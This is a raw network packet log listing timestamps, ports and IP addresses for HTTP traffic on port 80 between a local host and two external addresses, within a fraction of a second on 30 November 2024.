Nov 30, 2024 04:06:55.032208920 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.032445908 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.032490969 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.032545090 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.033555031 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.033596039 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.033617020 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.033628941 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.033677101 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.033767939 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.033823013 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.034209967 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.034260988 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.034343004 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.034399033 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.034653902 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.034698963 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.034765959 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.035257101 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.035305977 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.035368919 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.035420895 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.035767078 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.035810947 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.035888910 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.036389112 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.036454916 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.036474943 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.036534071 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.036879063 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.036942005 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.036977053 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.037429094 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.037533998 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.037560940 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.037611008 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.037986994 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.038033009 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.038105011 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.038554907 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.038609028 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.038629055 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.038686037 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.039103985 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.039149046 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.039201021 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.039587021 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.039635897 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.039694071 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.039753914 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.040209055 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.040271997 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.040338993 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.040698051 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.040760994 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.040874958 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.040926933 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.041315079 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.041358948 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.041414022 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.041781902 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.041835070 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.041863918 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.041914940 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.042547941 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.042592049 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.042660952 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.042856932 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.042901039 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.042968988 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.043016911 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.043528080 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.043586969 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.043637991 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.043939114 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.044030905 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.044121981 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.044665098 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.044708967 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.044765949 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.045037985 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.045084000 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.045131922 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.045181036 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.045774937 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.045816898 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.045882940 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.046123981 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.046164036 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.046219110 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.046269894 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.046853065 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.046905994 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.046941996 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.047223091 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.047280073 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.047292948 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.047347069 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.047976971 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.048022985 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.048079967 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.048310995 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.048322916 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.048366070 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.049079895 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.049124002 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.049177885 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.049402952 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.049449921 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.049483061 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.049580097 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.050192118 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.050240993 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.050302982 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.050467968 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.050513983 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.050518036 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.050569057 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.051326990 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.051374912 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.051409006 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.051553011 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.051604986 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.051632881 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.051685095 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.052414894 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.052459955 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.052545071 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.052632093 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.052685022 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.052745104 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.052793026 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.053524017 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.053567886 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.053626060 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.053751945 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.053762913 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.053803921 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.054641008 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.054691076 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.054725885 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.054842949 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.054852962 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.054898977 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.055790901 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.055839062 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.055857897 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.055939913 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.055952072 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.056034088 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.056869984 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.056915045 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.056951046 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.057048082 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.057058096 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.057095051 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.057971001 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.058089972 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.058099985 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.058186054 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.058819056 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.058890104 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.059075117 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.059144020 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.059173107 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.059185028 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.059266090 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.059315920 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.059628963 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.060198069 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.060235977 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.060266972 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.060277939 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.060323954 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.060358047 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.060410976 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.061326027 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.061372995 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.061383963 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.061394930 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.061440945 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.061507940 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.061559916 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.062413931 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.062459946 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.062479973 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.062491894 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.062535048 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.062612057 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.062675953 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.063529015 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.063539028 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.063550949 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.063586950 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.063616037 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.063694000 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.064625978 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.064677000 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.064688921 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.064698935 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.064744949 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.064745903 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.064785957 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.065727949 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.065804958 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.065815926 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.065859079 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.065896988 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.065912008 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.066797018 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.066842079 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.066869974 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.066881895 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.066941977 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.066942930 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.067028999 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.067887068 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.067940950 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.068010092 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.068021059 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.068058014 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.068084955 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.068085909 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.068965912 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.069020033 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.069081068 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.069133043 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.069154024 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.069164991 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.069200993 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.070054054 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.070105076 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.070168972 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.070241928 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.070255041 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.070265055 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.070303917 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.071325064 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.071379900 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.071381092 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.071393967 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.071433067 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.071438074 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.071502924 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.072252989 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.072304010 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.072345972 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.072400093 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.072433949 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.072444916 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.072479963 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.073303938 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.073406935 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.073416948 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.073472977 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.073546886 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.073556900 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.073636055 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.074397087 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.074450016 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.074510098 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.074563026 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.074644089 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.074688911 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.074785948 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.075498104 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.075551033 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.075671911 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.075722933 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.075784922 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.075795889 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.075839043 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.076606035 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.076652050 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.076706886 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.076761007 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.076857090 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.076941013 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.076947927 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.077651024 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.077702999 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.077756882 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.077811003 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.077953100 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.077997923 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.078059912 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.078743935 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.078794956 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.078824997 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.078876972 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.079042912 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.079085112 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.079180956 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.079855919 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.079919100 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.079940081 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.080008030 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.080174923 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.080312967 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.080339909 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.080920935 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.081026077 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.081281900 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.081410885 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.081975937 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.082055092 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.082055092 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.082093954 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.082149982 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.082387924 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.082432985 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.082506895 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.083072901 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.083122015 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.083184958 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.083230019 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.083503962 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.083544016 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.083606958 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.084183931 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.084239006 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.084286928 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.084366083 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.084623098 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.084667921 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.084714890 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.085284948 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.085330963 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.085371017 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.085419893 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.085741997 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.085813999 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.085844994 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.086344004 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.086395025 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.086437941 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.086488008 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.086793900 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.086838961 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.087435007 CET	80	49892	31.41.244.11	192.168.2.4
